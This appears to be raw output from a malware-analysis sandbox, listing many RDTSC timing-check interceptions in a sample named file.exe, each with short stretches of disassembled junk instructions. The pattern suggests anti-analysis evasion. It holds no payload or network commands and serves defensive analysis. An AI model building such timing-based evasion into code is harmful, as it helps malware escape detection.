Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BE12B second address: 3BE130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BE130 second address: 3BE155 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27492B520Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F27492B5213h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BE155 second address: 3BE159 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BE159 second address: 3BE15F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BE488 second address: 3BE49D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F2749204C2Eh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BEB47 second address: 3BEB4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BEB4D second address: 3BEB53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BEB53 second address: 3BEB58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BEB58 second address: 3BEB5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BEB5E second address: 3BEB62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C79DA second address: 3C79F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2749204C2Fh 0x00000009 jnl 00007F2749204C26h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C7CE3 second address: 3C7CE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C7E23 second address: 3C7E29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C7E29 second address: 3C7E57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F27492B5211h 0x00000008 jmp 00007F27492B5218h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C82BD second address: 3C82C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C82C1 second address: 3C82E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007F27492B5219h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D05C0 second address: 3D05C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D05C7 second address: 3D05D1 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F27492B520Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CE677 second address: 3CE683 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jno 00007F2749204C26h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CE683 second address: 3CE687 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CE807 second address: 3CE80C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CEAE7 second address: 3CEAEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CEAEE second address: 3CEAF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CEAF4 second address: 3CEAFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CEAFA second address: 3CEAFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CEAFF second address: 3CEB1A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jng 00007F27492B5206h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F27492B520Dh 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CEB1A second address: 3CEB3D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2749204C26h 0x00000008 jne 00007F2749204C26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push edi 0x00000013 jns 00007F2749204C2Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CF0A0 second address: 3CF0A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CF0A9 second address: 3CF0D2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F2749204C2Bh 0x00000008 jmp 00007F2749204C34h 0x0000000d pop edi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CF3D9 second address: 3CF3DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D041D second address: 3D0423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D0423 second address: 3D0428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D0428 second address: 3D042E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D042E second address: 3D044E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F27492B5206h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F27492B520Bh 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 js 00007F27492B520Eh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D044E second address: 3D045A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D045A second address: 3D045E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D9154 second address: 3D916B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F2749204C26h 0x00000009 push edi 0x0000000a pop edi 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f jg 00007F2749204C26h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D92A3 second address: 3D92E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push esi 0x00000006 pop esi 0x00000007 jmp 00007F27492B5213h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 jbe 00007F27492B5206h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F27492B5217h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E4923 second address: 3E492A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E492A second address: 3E4934 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F27492B5212h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E4934 second address: 3E497A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F2749204C26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push esi 0x0000000e js 00007F2749204C26h 0x00000014 jmp 00007F2749204C39h 0x00000019 pop esi 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F2749204C2Ch 0x00000021 jmp 00007F2749204C2Ah 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E9FE5 second address: 3E9FEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F27492B5206h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E9FEF second address: 3E9FF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E9FF3 second address: 3E9FF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E9FF9 second address: 3EA00D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2749204C2Bh 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EA00D second address: 3EA013 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E9B72 second address: 3E9B78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E9B78 second address: 3E9B91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27492B520Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007F27492B5206h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E9B91 second address: 3E9B95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E9CED second address: 3E9CF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F27492B5206h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E9CF7 second address: 3E9CFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EF6DC second address: 3EF6E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jbe 00007F27492B5206h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F8D1A second address: 3F8D23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F8B86 second address: 3F8BA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F27492B5218h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F8BA3 second address: 3F8BB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F2749204C26h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FBE82 second address: 3FBE99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27492B520Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FBE99 second address: 3FBEA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FBEA3 second address: 3FBECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jno 00007F27492B5206h 0x0000000c je 00007F27492B5206h 0x00000012 jmp 00007F27492B5217h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FBECE second address: 3FBED3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 401D4F second address: 401D72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27492B5219h 0x00000007 je 00007F27492B5206h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 401D72 second address: 401D7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jns 00007F2749204C26h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 401D7E second address: 401D8A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 401D8A second address: 401D8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 402733 second address: 402737 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 402737 second address: 402743 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 402743 second address: 40276B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F27492B5214h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F27492B520Dh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 40276B second address: 402783 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 402783 second address: 40278E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 40278E second address: 4027A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2749204C30h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4027A2 second address: 4027A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4027A6 second address: 4027AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 40316F second address: 403174 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 403174 second address: 403185 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2749204C2Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 403185 second address: 40318B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4063D6 second address: 4063DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4063DC second address: 4063E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4063E0 second address: 406409 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2749204C30h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007F2749204C37h 0x00000011 jmp 00007F2749204C2Bh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 405FEF second address: 405FF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 405FF4 second address: 406003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F2749204C26h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 406003 second address: 40600D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F27492B5206h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41723B second address: 417254 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 jns 00007F2749204C2Eh 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 417254 second address: 41725A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4170BE second address: 4170C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4170C2 second address: 4170C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4170C6 second address: 4170CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4170CE second address: 4170D8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F27492B520Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4170D8 second address: 4170E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4170E0 second address: 4170F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007F27492B5233h 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4140CE second address: 4140EB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F2749204C28h 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push ecx 0x00000013 jnc 00007F2749204C26h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 423696 second address: 42369D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43B4D9 second address: 43B4FE instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F2749204C28h 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jmp 00007F2749204C37h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43A44D second address: 43A451 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30BFBA second address: 30BFBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30BFBE second address: 30BFC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30BFC2 second address: 30BFE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2749204C32h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007F2749204C26h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30BFE4 second address: 30BFE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43AD7B second address: 43AD7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43AD7F second address: 43AD9E instructions: 0x00000000 rdtsc 0x00000002 js 00007F27492B5206h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jp 00007F27492B5206h 0x00000011 pop esi 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F27492B520Ah 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43AD9E second address: 43ADAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F2749204C26h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43ADAA second address: 43ADB4 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F27492B5206h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43ADB4 second address: 43ADC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007F2749204C26h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43DE4A second address: 43DE5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27492B520Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43E477 second address: 43E47F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
